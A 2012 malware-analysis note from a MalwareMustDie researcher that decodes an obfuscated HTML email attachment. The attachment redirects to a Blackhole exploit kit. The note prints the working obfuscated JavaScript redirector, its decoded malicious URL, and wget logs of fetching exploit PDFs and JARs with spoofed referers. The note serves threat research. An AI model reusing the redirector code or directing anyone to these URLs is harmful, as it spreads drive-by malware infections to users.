======================================
#MalwareMustDie ; @unixfreaxjp ~]$ date
Thu Nov 22 17:27:12 JST 2012
The finding of an obfuscated version of PluginDetect 0.7.9
and a guide to decoding it manually
WARNING: The URLs in this note may infect your PC; do not attempt to click them
=======================================
I had reports on Twitter of two infections from emails with an obfuscated HTML infector attached,
thanks to @KDPryor, as per the following pic snapshots:
https://twitter.com/MalwareMustDie/status/271104793567707137
https://twitter.com/MalwareMustDie/status/271439256264777728
-----------------------------------------------------------------------
//The attached HTML infector looks like this:
Please wait..
You will be forwarded... Please wait..
Internet Explorer and Mozilla Firefox compatible only
----------------------------------------------------------------
// the above ↑ contains the obfuscated JavaScript redirector,
// which can be decoded easily with the method below....
// PS: The pic of this deobfuscation is in here: https://pbs.twimg.com/media/A8Mk_pOCYAEm_lL.jpg:large
try
{
if(window.document)window["doc"+"ument"]["body"]="vasasf"
}
catch(bawetawe)
{
if(true) <==========
// ^^^^^^^
{
v=1; <==============
// ^^^^^^
try
{
fawbe--
}
catch(afnwenew)
{
try
{
(v+v)()
}
catch(gngrthn)
{
try
{
if(020===0x10)v["document"]["bo"+"dy"]="123"
}
catch(gfdnfdgber)
{
m=123;
if("".substr)ev=eval;
}
}
n=["4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e","1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g","17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45","4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h","4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49","1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c","19","29","50","a"];
h=2;
s="";
if(m)for(i=0;i-106!=0;i++)
{
k=i;
if(true)s+=String.fromCharCode(parseInt(n[i],25)); <========
// ^^^^^^^^
}
z=s;
ev(""+z)
}
}
}
----------------output ↓-------------------
var1=49;
var2=var1;
if(var1==var2) {document.location="http://hamasutra.ru:8080/forum/links/column.php";}
---------------------------------------
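// The same decoding done statically, as an added example (not code from the original note): the n array and the parseInt(n[i],25) call are copied from the snippet above into a string, and the decoder regexes the token array and the radix out of it instead of handing anything to eval(). The helper names decodeRedirector/extractLocation are mine.

```javascript
// Added example: static decoder for the base-25 String.fromCharCode redirector
// shown above. The obfuscated snippet is embedded here (copied from the note)
// so the example runs offline; nothing from it is ever eval()'d.
const SAMPLE = 'n=["4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e","1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g","17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45","4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h","4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49","1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c","19","29","50","a"];\n' +
  'h=2;s="";if(m)for(i=0;i-106!=0;i++){k=i;if(true)s+=String.fromCharCode(parseInt(n[i],25));}z=s;ev(""+z)';

// Pull the token array assigned to n and the radix passed to parseInt out of
// the obfuscated source, then apply the same transform the loop performs.
// (hypothetical helper written for this example, not from the note)
function decodeRedirector(src) {
  const arr = src.match(/\bn\s*=\s*\[([^\]]*)\]/);
  const rad = src.match(/parseInt\(\s*n\[i\]\s*,\s*(\d+)\s*\)/);
  if (!arr || !rad) throw new Error('token array or radix not found');
  const radix = parseInt(rad[1], 10);
  const tokens = arr[1].split(',').map(t => t.trim().replace(/^["']|["']$/g, ''));
  return tokens.map(t => String.fromCharCode(parseInt(t, radix))).join('');
}

// Extract the landing URL the decoded script would assign to document.location.
function extractLocation(decoded) {
  const m = decoded.match(/document\.location\s*=\s*["']([^"']+)["']/);
  return m ? m[1] : null;
}

const decoded = decodeRedirector(SAMPLE);
console.log(decoded);
console.log('redirect target:', extractLocation(decoded));
```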
// let's fetch it to learn the source...
// below is a successful attempt...
--12:43:04-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php'
Resolving hamasutra.ru... 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Connecting to hamasutra.ru|216.24.196.66|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:43:09 (106.64 KB/s) - `column.php' saved [92154]
// an unsuccessful attempt looks like the reference below....
// you must try again with a different IP or referer
--12:43:26-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php.1'
Resolving hamasutra.ru... seconds 0.00, 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Caching hamasutra.ru => 216.24.196.66 82.165.193.26 202.180.221.186 203.80.16.81
Connecting to hamasutra.ru|216.24.196.66|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5560 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 502 Bad Gateway
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 03:43:22 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
// This is the file fetched...
//
@unixfreaxjp /malware]$ date
Thu Nov 22 12:47:02 JST 2012
@unixfreaxjp /malware]$ ls -alF
-rwx------ 1 xxxx xxxx 92154 Nov 21 18:43 column.php*
// The contents of the fetched column.php are as below...
// It is an obfuscated PluginDetect 0.7.9 <==== POINT!
-----------------------------------------------------------------------------
// Is this really BHEK2?
// try to fetch t.pdf & the jars...
// with the current wget settings...
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie is banging on your Door
--referer (referer) to http://www.ups.com/?Site=Corporate&cookie=am_en_home_none // this is url referer of one of the spam emails
// get t.pdf
--12:58:25-- http://hamasutra.ru:8080/forum/data/t.pdf
Resolving hamasutra.ru... seconds 0.00, 203.80.16.81, 216.24.196.66, 82.165.193.26, ...
Caching hamasutra.ru => 203.80.16.81 216.24.196.66 82.165.193.26 202.180.221.186
Connecting to hamasutra.ru|203.80.16.81|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5528 (new refcount 1).
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 12:21:44 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
12:58:27 (79.24 KB/s) - `t.pdf' saved [8103/8103]
// get spn.jar
---request begin---
GET /forum/data/spn.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:00:25 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350002-32c4-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 12996
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 12,996 (13K) [application/java-archive]
13:00:31 (85.16 KB/s) - `spn.jar' saved [12996/12996]
// get spn2.jar
---request begin---
GET /forum/data/spn2.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:02:30 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350003-4fb8-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 20408
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 20,408 (20K) [application/java-archive]
3:02:35 (73.93 KB/s) - `spn2.jar' saved [20408/20408]
// get spn3.jar
---request begin---
GET /forum/data/spn3.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:01:38 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,022 (21K) [application/java-archive]
13:03:43 (31.58 KB/s) - `spn3.jar' saved [21022/21022]
// Let's check that this is not CoolEK or another EK by testing for
// the special function of BHEK's PluginDetect 0.7.9: getJavaInfo.jar
// let's fetch getJavaInfo.jar
---request begin---
GET /forum/data/getJavaInfo.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:08:27 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "13504e0-24b-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 587
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 587 [application/java-archive]
13:10:30 (17.13 MB/s) - `getJavaInfo.jar' saved [587/587]
------------------------------------------------------------------------
// back to the evil script in column.php..
// let's make it readable...
//↑oh, at the bottom there's a direct download url...
// looks like a pdf download to me..,
// let's assemble the army! no, ...assemble the url↓
..blah..../forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f
--------------------------------------------------
// Let's fetch this file....
Resolving hamasutra.ru... seconds 0.00, 82.165.193.26, 202.180.221.186, 203.80.16.81, ...
Caching hamasutra.ru => 82.165.193.26 202.180.221.186 203.80.16.81 216.24.196.66
Connecting to hamasutra.ru|82.165.193.26|:8080... seconds 0.00, connected.
Created socket 1896.
---request begin---
GET //forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 05:35:20 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 14749
Content-Disposition: inline; filename=1ed92.pdf
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 14,749 (14K) [application/pdf]
13:40:29 (23.61 KB/s) - `column.php@hdf=30%3A1n%3A1i%3A1i%3A33&puihqtt=b&hdmk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pgrzxii=1f%3A1d%3A1f%3A1d%3A1f%3A1d%3A1f' saved [14749/14749]
// let's rename the long filename to a short one...
// call it infector.pdf
------------------------------------------
// OK, we got many samples..
// We proved it was BHEK2,
// We go back to the rest of the garbled code in column.php.....
// we all want to see whether the PluginDetect 0.7.9 is really obfuscated or not, don't we?
// OK, let's strip the html code EXCEPT the tags with values....
// To make it easier, let's look at the structure of this code first...